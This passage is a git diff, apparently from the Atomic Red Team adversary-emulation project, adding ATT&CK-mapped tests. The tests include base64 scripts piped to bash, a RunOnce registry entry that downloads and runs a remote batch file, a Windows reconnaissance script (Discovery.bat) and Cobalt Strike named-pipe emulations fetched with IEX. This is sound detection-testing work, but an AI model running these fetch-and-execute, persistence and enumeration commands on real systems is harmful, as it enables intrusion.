+echo #{sh_encoded} | base64 -d | bash
+```
+
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: base64 must be present
+##### Check Prereq Commands:
+```sh
+which base64
+```
+##### Get Prereq Commands:
+```sh
+echo "please install base64"
+```
+
+
+
+
 <br/>
diff --git a/atomics/T1140/T1140.yaml b/atomics/T1140/T1140.yaml
index 1e4700d6..18ba1004 100644
--- a/atomics/T1140/T1140.yaml
+++ b/atomics/T1140/T1140.yaml
@@ -171,3 +171,43 @@ atomic_tests:
       echo $ENCODED > #{encoded_file} && xxd -r -p < #{encoded_file}
       echo $ENCODED > #{encoded_file} && cat #{encoded_file} | xxd -r -p
       echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | xxd -r -p
+- name: Linux Base64 Encoded Shebang in CLI
+  auto_generated_guid: 3a15c372-67c1-4430-ac8e-ec06d641ce4d
+  description: |
+    Using Linux Base64 Encoded shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it. 
+  supported_platforms:
+  - linux
+  - macos
+  input_arguments:
+    bash_encoded:
+      description: Encoded #!/bin/bash script
+      type: string
+      default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+    dash_encoded:
+      description: Encoded #!/bin/dash script
+      type: string
+      default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+    fish_encoded:
+      description: Encoded #!/bin/fish script
+      type: string
+      default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+    sh_encoded:
+      description: Encoded #!/bin/sh script
+      type: string
+      default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK
+  dependencies:
+  - description: |
+      base64 must be present
+    prereq_command: |
+      which base64
+    get_prereq_command: |
+      echo "please install base64"
+  executor:
+    name: sh
+    elevation_required: false
+    command: |
+      echo #{bash_encoded} | base64 -d | bash
+      echo #{dash_encoded} | base64 -d | bash
+      echo #{fish_encoded} | base64 -d | bash
+      echo #{sh_encoded} | base64 -d | bash
+      
diff --git a/atomics/T1482/T1482.md b/atomics/T1482/T1482.md
index 5fafdf42..c197f376 100644
--- a/atomics/T1482/T1482.md
+++ b/atomics/T1482/T1482.md
@@ -187,6 +187,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
@@ -233,6 +234,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
diff --git a/atomics/T1482/T1482.yaml b/atomics/T1482/T1482.yaml
index c45b1389..dfa4c0f5 100644
--- a/atomics/T1482/T1482.yaml
+++ b/atomics/T1482/T1482.yaml
@@ -81,6 +81,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
@@ -105,6 +106,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md
index aaaf1968..d83f24f7 100644
--- a/atomics/T1547.001/T1547.001.md
+++ b/atomics/T1547.001/T1547.001.md
@@ -180,7 +180,7 @@ Upon successful execution, a new entry will be added to the runonce item in the
 
 ```powershell
 $RunOnceKey = "#{reg_key_path}"
-set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
 ```
 
 #### Cleanup Commands:
@@ -273,7 +273,8 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsesta
 <br/>
 
 ## Atomic Test #6 - Suspicious bat file run from startup Folder
-bat files can be placed in and executed from the startup folder to maintain persistance.
+bat files can be placed in and executed from the startup folder to maintain persistance
+
 Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
 folder and will also run when the computer is restarted and the user logs in.
 
diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml
index 696b3681..92b7f610 100644
--- a/atomics/T1547.001/T1547.001.yaml
+++ b/atomics/T1547.001/T1547.001.yaml
@@ -59,7 +59,7 @@ atomic_tests:
   executor:
     command: |
       $RunOnceKey = "#{reg_key_path}"
-      set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+      set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
     cleanup_command: |
       Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
     name: powershell
@@ -106,7 +106,8 @@ atomic_tests:
 - name: Suspicious bat file run from startup Folder
   auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
   description: |
-    bat files can be placed in and executed from the startup folder to maintain persistance.
+    bat files can be placed in and executed from the startup folder to maintain persistance
+    
     Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
     folder and will also run when the computer is restarted and the user logs in.
   supported_platforms:
diff --git a/atomics/T1547.001/src/Discovery.bat b/atomics/T1547.001/src/Discovery.bat
new file mode 100644
index 00000000..46677d8d
--- /dev/null
+++ b/atomics/T1547.001/src/Discovery.bat
@@ -0,0 +1,44 @@
+net user Administrator /domain
+net Accounts
+net localgroup administrators
+net use
+net share
+net group "domain admins" /domain
+net config workstation
+net accounts
+net accounts /domain
+net view
+sc.exe query
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
+reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+wmic useraccount list
+wmic useraccount get /ALL
+wmic startup list brief
+wmic share list
+wmic service get name,displayname,pathname,startmode
+wmic process list brief
+wmic process get caption,executablepath,commandline
+wmic qfe get description,installedOn /format:csv
+arp -a
+whoami
+ipconfig /displaydns
+route print
+netsh advfirewall show allprofiles
+systeminfo
+qwinsta
+quser
diff --git a/atomics/T1559/T1559.md b/atomics/T1559/T1559.md
new file mode 100644
index 00000000..eebf3cf5
--- /dev/null
+++ b/atomics/T1559/T1559.md
@@ -0,0 +1,244 @@
+# T1559 - Inter-Process Communication
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1559)
+<blockquote>Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. 
+
+Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Cobalt Strike Artifact Kit pipe](#atomic-test-1---cobalt-strike-artifact-kit-pipe)
+
+- [Atomic Test #2 - Cobalt Strike Lateral Movement (psexec_psh) pipe](#atomic-test-2---cobalt-strike-lateral-movement-psexec_psh-pipe)
+
+- [Atomic Test #3 - Cobalt Strike SSH (postex_ssh) pipe](#atomic-test-3---cobalt-strike-ssh-postex_ssh-pipe)
+
+- [Atomic Test #4 - Cobalt Strike post-exploitation pipe (4.2 and later)](#atomic-test-4---cobalt-strike-post-exploitation-pipe-42-and-later)
+
+- [Atomic Test #5 - Cobalt Strike post-exploitation pipe (before 4.2)](#atomic-test-5---cobalt-strike-post-exploitation-pipe-before-42)
+
+
+<br/>
+
+## Atomic Test #1 - Cobalt Strike Artifact Kit pipe
+Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bd13b9fc-b758-496a-b81a-397462f82c72
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 1
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Named pipe executors must exist on disk
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+$zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Cobalt Strike Lateral Movement (psexec_psh) pipe
+Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 830c8b6c-7a70-4f40-b975-8bbe74558acd
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 2
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Named pipe executors must exist on disk
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+$zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Cobalt Strike SSH (postex_ssh) pipe
+Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 3
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Named pipe executors must exist on disk
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+$zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Cobalt Strike post-exploitation pipe (4.2 and later)
+Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7a48f482-246f-4aeb-9837-21c271ebf244
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Named pipe executors must exist on disk
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+$zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Cobalt Strike post-exploitation pipe (before 4.2)
+Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8dbfc15c-527b-4ab0-a272-019f469d367f
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 5
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Named pipe executors must exist on disk
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+$zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+```
+
+
+
+
+<br/>
diff --git a/atomics/T1559/T1559.yaml b/atomics/T1559/T1559.yaml
new file mode 100644
index 00000000..a27c1b54
--- /dev/null
+++ b/atomics/T1559/T1559.yaml
@@ -0,0 +1,123 @@
+attack_technique: T1559
+display_name: Inter-Process Communication
+atomic_tests:
+
+- name: Cobalt Strike Artifact Kit pipe
+  auto_generated_guid: bd13b9fc-b758-496a-b81a-397462f82c72
+  description: |
+    Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+    
+    The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Named pipe executors must exist on disk
+    prereq_command: |
+      if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+      $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+      Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+  executor:
+    command: |
+      "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 1
+    name: command_prompt
+    
+- name: Cobalt Strike Lateral Movement (psexec_psh) pipe
+  auto_generated_guid: 830c8b6c-7a70-4f40-b975-8bbe74558acd
+  description: |
+    Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+    
+    The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Named pipe executors must exist on disk
+    prereq_command: |
+      if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+      $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+      Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+  executor:
+    command: |
+      "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 2
+    name: command_prompt
+    
+- name: Cobalt Strike SSH (postex_ssh) pipe
+  auto_generated_guid: d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
+  description: |
+    Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+    
+    The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Named pipe executors must exist on disk
+    prereq_command: |
+      if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+      $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+      Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+  executor:
+    command: |
+      "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 3
+    name: command_prompt
+
+- name: Cobalt Strike post-exploitation pipe (4.2 and later)
+  auto_generated_guid: 7a48f482-246f-4aeb-9837-21c271ebf244
+  description: |
+    Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+    
+    The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Named pipe executors must exist on disk
+    prereq_command: |
+      if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+      $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+      Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+  executor:
+    command: |
+      "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4
+    name: command_prompt
+    
+- name: Cobalt Strike post-exploitation pipe (before 4.2)
+  auto_generated_guid: 8dbfc15c-527b-4ab0-a272-019f469d367f
+  description: |
+    Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+    
+    The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Named pipe executors must exist on disk
+    prereq_command: |
+      if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+      $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+      Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+  executor:
+    command: |
+      "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 5
+    name: command_prompt
diff --git a/atomics/T1580/T1580.md b/atomics/T1580/T1580.md
new file mode 100644
index 00000000..ddb7e360
--- /dev/null
+++ b/atomics/T1580/T1580.md
@@ -0,0 +1,87 @@
+# T1580 - Cloud Infrastructure Discovery
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1580)
+<blockquote>An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - AWS - EC2 Enumeration from Cloud Instance](#atomic-test-1---aws---ec2-enumeration-from-cloud-instance)
+
+
+<br/>
+
+## Atomic Test #1 - AWS - EC2 Enumeration from Cloud Instance
